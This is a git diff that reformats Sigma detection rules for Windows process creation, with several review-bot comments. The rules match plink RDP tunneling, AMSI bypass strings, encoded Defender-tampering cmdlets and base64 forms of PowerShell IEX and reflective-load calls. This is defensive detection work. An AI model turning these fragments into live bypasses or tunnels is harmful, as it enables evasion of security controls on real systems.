diff --git a/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml b/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml
index 36b8d8227..8638d80ce 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml
@@ -23,7 +23,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Description: Command-line SSH, Telnet, and Rlogin client
- CommandLine|contains: ' -R '
+ CommandLine|contains: ' -R '
 condition: process_creation and selection
 falsepositives:
 - Administrative activity using a remote port forwarding to a local port
diff --git a/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml
index 8bd68c610..8d66807d0 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml
@@ -1,8 +1,8 @@
 title: Potential RDP Tunneling Via SSH Plink
 id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da
 related:
- - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d
- type: similar
+ - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe
+ type: similar
 status: test
 description: Execution of plink to perform data exfiltration and tunneling
 references:
@@ -23,12 +23,12 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_a:
 Image|endswith: \plink.exe
- CommandLine|contains: :127.0.0.1:3389
+ CommandLine|contains: :127.0.0.1:3389
 selection_b1:
 Image|endswith: \plink.exe
- CommandLine|contains: :3389
+ CommandLine|contains: :3389
 selection_b2:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -P 443'
 - ' -P 22'
 condition: process_creation and (selection_a or all of selection_b*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml
index 43c276590..b5067a04e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml
@@ -1,8 +1,7 @@ title: Suspicious Powercfg Execution To Change Lock Screen Timeout id: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b status: test -description: Detects suspicious execution of 'Powercfg.exe' to change lock screen - timeout +description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options @@ -19,17 +18,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_power: - - Image|endswith: \powercfg.exe - - OriginalFileName: PowerCfg.exe + - Image|endswith: \powercfg.exe + - OriginalFileName: PowerCfg.exe selection_standby: - - CommandLine|contains|all: - - '/setacvalueindex ' - - SCHEME_CURRENT - - SUB_VIDEO - - VIDEOCONLOCK - - CommandLine|contains|all: - - '-change ' - - -standby-timeout- + # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK + - CommandLine|contains|all: + - '/setacvalueindex ' + - SCHEME_CURRENT + - SUB_VIDEO + - VIDEOCONLOCK + # powercfg -change -standby-timeout-dc 3000 + # powercfg -change -standby-timeout-ac 3000 + - CommandLine|contains|all: + - '-change ' + - -standby-timeout- condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml index 504698898..5208d909c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml 
@@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - ProccessCreation id: c86500e9-a645-4680-98d7-f882c70c1ea3 related: - - id: 91e69562-2426-42ce-a647-711b8152ced6 - type: similar + - id: 91e69562-2426-42ce-a647-711b8152ced6 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals @@ -27,14 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml index ac28ebf57..9a98347f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml 
@@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - ProcCreation id: 70bc5215-526f-4477-963c-a47a5c9ebd12 related: - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 @@ -27,18 +26,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' selection_dll: - CommandLine|contains: Microsoft.ActiveDirectory.Management.dll + CommandLine|contains: Microsoft.ActiveDirectory.Management.dll condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the library for administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml index 84e3244aa..d2fea9a9c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml 
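Review bot: The reflowed `description` still names the module `"Microsoft.ActiveDirectory.Management.dl"`, while `selection_dll` in the second hunk of this file matches `Microsoft.ActiveDirectory.Management.dll`; the description should read `"Microsoft.ActiveDirectory.Management.dll"` so the prose and the detection string agree. Since the commit rewrites that description line anyway, the missing `l` can be fixed in the same line without a separate change.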
@@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Cmdlet id: b36d01a3-ddaf-4804-be18-18a6247adfcd related: - - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 - type: similar + - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content @@ -23,19 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: Add-WindowsCapability + CommandLine|contains: Add-WindowsCapability selection_capa: - CommandLine|contains: OpenSSH. + CommandLine|contains: OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: process_creation and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml index 62e9fa845..0fcbb37c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Via .NET Reflection id: 30edb182-aa75-42c0-b0a9-e998bb29067c related: - - id: 4f927692-68b5-4267-871b-073c45f4f6fe - type: obsoletes + - id: 4f927692-68b5-4267-871b-073c45f4f6fe + type: obsoletes status: test -description: Detects Request to "amsiInitFailed" that can be used to disable AMSI - Scanning +description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning references: - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/ - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -24,11 +23,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - System.Management.Automation.AmsiUtils - amsiInitFailed selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml index e8c37ecb2..8cd9fe7ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml 
@@ -1,11 +1,10 @@ title: Potential AMSI Bypass Using NULL Bits id: 92a974db-ab84-457f-9ec0-55db83d7a825 related: - - id: fa2559c8-1197-471d-9cdd-05a0273d4522 - type: similar + - id: fa2559c8-1197-471d-9cdd-05a0273d4522 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - if(0){{{0}}}' -f $(0 -as [char]) + - '#' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml index fd9d31779..34bd73938 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml @@ -6,8 +6,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html - https://github.com/frgnca/AudioDeviceCmdlets -author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, - Nasreddine Bencherchali (Nextron Systems) +author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/04/06 tags: 
@@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - WindowsAudioDevice-Powershell-Cmdlet - Toggle-AudioDevice - 'Get-AudioDevice ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml index e4ead885c..4abdaeb33 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml @@ -1,12 +1,10 @@ title: Suspicious Encoded PowerShell Command Line id: ca2092a1-c273-4878-9b4b-0d60115bf5ea status: test -description: Detects suspicious powershell process starts with base64 encoded commands - (e.g. Emotet) +description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) references: - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community date: 2018/09/03 modified: 2023/04/06 tags: @@ -21,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' # covers -en and -enc selection_cli_content: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' 
@@ -41,12 +39,11 @@ detection: - ' UwB' - ' cwB' selection_standalone: - CommandLine|contains: + CommandLine|contains: - '.exe -ENCOD ' - - ' BA^J e-' + - ' BA^J e-' # Reversed filter_optional_remote_signed: - CommandLine|contains: ' -ExecutionPolicy remotesigned ' - condition: process_creation and (selection_img and (all of selection_cli_* or - selection_standalone) and not 1 of filter_optional_*) + CommandLine|contains: ' -ExecutionPolicy remotesigned ' + condition: process_creation and (selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml index 89385b6a4..841c26fe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml @@ -1,8 +1,7 @@ title: PowerShell Base64 Encoded FromBase64String Cmdlet id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c status: test -description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process - command line +description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line references: - Internal Research author: Florian Roth (Nextron Systems) 
@@ -22,11 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: ::FromBase64String - - CommandLine|contains: - - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA - - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA - - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw + - CommandLine|base64offset|contains: ::FromBase64String + # UTF-16 LE + - CommandLine|contains: + - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA + - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA + - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml index 9eb24f190..df3ee508a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml 
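Review bot: The new `# UTF-16 LE` comment above the second `CommandLine|contains` list names the encoding but not what the three strings are, and the same label is spelled differently in the sibling hunks of this commit (`# UTF16 LE` in proc_creation_win_powershell_base64_iex.yml, `# UTF-16LE` in proc_creation_win_powershell_base64_invoke.yml, `# UTF16-LE` in proc_creation_win_powershell_base64_mppreference.yml). Pick one spelling for all four files and make the comment self-explanatory, e.g. `# UTF-16LE encoding of "::FromBase64String" at the three possible base64 offsets; the base64offset item above covers the UTF-8 form`. The rule's `condition` line is visible in the hunk, so this is the whole selection.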
@@ -19,30 +19,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: - - IEX ([ - - iex ([ - - iex (New - - IEX (New - - IEX([ - - iex([ - - iex(New - - IEX(New - - IEX((' - - iex((' - - CommandLine|contains: - - SQBFAFgAIAAoAFsA - - kARQBYACAAKABbA - - JAEUAWAAgACgAWw - - aQBlAHgAIAAoAFsA - - kAZQB4ACAAKABbA - - pAGUAeAAgACgAWw - - aQBlAHgAIAAoAE4AZQB3A - - kAZQB4ACAAKABOAGUAdw - - pAGUAeAAgACgATgBlAHcA - - SQBFAFgAIAAoAE4AZQB3A - - kARQBYACAAKABOAGUAdw - - JAEUAWAAgACgATgBlAHcA + - CommandLine|base64offset|contains: + - IEX ([ + - iex ([ + - iex (New + - IEX (New + - IEX([ + - iex([ + - iex(New + - IEX(New + - IEX((' + - iex((' + # UTF16 LE + - CommandLine|contains: + - SQBFAFgAIAAoAFsA + - kARQBYACAAKABbA + - JAEUAWAAgACgAWw + - aQBlAHgAIAAoAFsA + - kAZQB4ACAAKABbA + - pAGUAeAAgACgAWw + - aQBlAHgAIAAoAE4AZQB3A + - kAZQB4ACAAKABOAGUAdw + - pAGUAeAAgACgATgBlAHcA + - SQBFAFgAIAAoAE4AZQB3A + - kARQBYACAAKABOAGUAdw + - JAEUAWAAgACgATgBlAHcA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml index 9d5ac60e5..d0d300a5b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Invoke Keyword id: 6385697e-9f1b-40bd-8817-f4a91f40508e related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: obsoletes + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: obsoletes status: test description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls references: 
@@ -24,19 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' selection_cli_invoke: - CommandLine|contains: + CommandLine|contains: + # Invoke- + # UTF-16LE - SQBuAHYAbwBrAGUALQ - kAbgB2AG8AawBlAC0A - JAG4AdgBvAGsAZQAtA + # UTF-8 - SW52b2tlL - ludm9rZS - JbnZva2Ut diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml index 253932d7f..955760952 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml @@ -1,8 +1,7 @@ title: Powershell Base64 Encoded MpPreference Cmdlet id: c6fb44c6-71f5-49e6-9462-1425d328aee3 status: test -description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries - to modifies or tamper with Windows Defender AV +description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md 
@@ -22,24 +21,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: - - 'Add-MpPreference ' - - 'Set-MpPreference ' - - 'add-mppreference ' - - 'set-mppreference ' - - CommandLine|contains: - - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA - - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - CommandLine|base64offset|contains: + - 'Add-MpPreference ' + - 'Set-MpPreference ' + - 'add-mppreference ' + - 'set-mppreference ' + - CommandLine|contains: + # UTF16-LE + - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml index d672b467c..357a3cd38 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Reflective Assembly Load id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 related: - - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 - type: similar + - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 + type: similar status: test description: Detects base64 encoded .NET reflective loading of Assembly references: @@ -26,16 +26,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # [Reflection.Assembly]::Load( - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA + # [reflection.assembly]::("Load") - AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC - BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp - AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK + # [Reflection.Assembly]::("Load") - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA + # [reflection.assembly]::Load( - WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA 
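Review bot: The `selection` in the `@@ -26,16 +26,20 @@` hunk lists only UTF-16LE base64 forms (the alternating `A` pattern in every string), so a command line that carries the same reflective-load text base64-encoded as UTF-8 is not matched unless another rule covers it. Sibling rules in this commit (proc_creation_win_powershell_base64_frombase64string.yml) pair the hand-listed UTF-16LE strings with a `CommandLine|base64offset|contains` item that derives the UTF-8 offsets automatically; the four decoded forms are already given in the new comments, so the same can be done here by turning `selection` into a list of two maps. The same observation appears to apply to the `@@ -27,22 +26,28 @@` hunk of proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml, whose six concatenated forms are likewise UTF-16LE only. The rule's `condition` and tail are outside this hunk.
```yaml
    selection:
        - CommandLine|base64offset|contains:
            # UTF-8 forms of the same four strings (casing matters for base64offset)
            - '[Reflection.Assembly]::Load('
            - '[reflection.assembly]::("Load")'
            - '[Reflection.Assembly]::("Load")'
            - '[reflection.assembly]::Load('
        - CommandLine|contains:
            # … unchanged: the twelve UTF-16LE strings and their comments …
```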
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml index b3088b953..a4e93da83 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml @@ -1,11 +1,10 @@ title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 related: - - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 - type: similar + - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 + type: similar status: test -description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used - in .NET "reflection.assembly" +description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ 
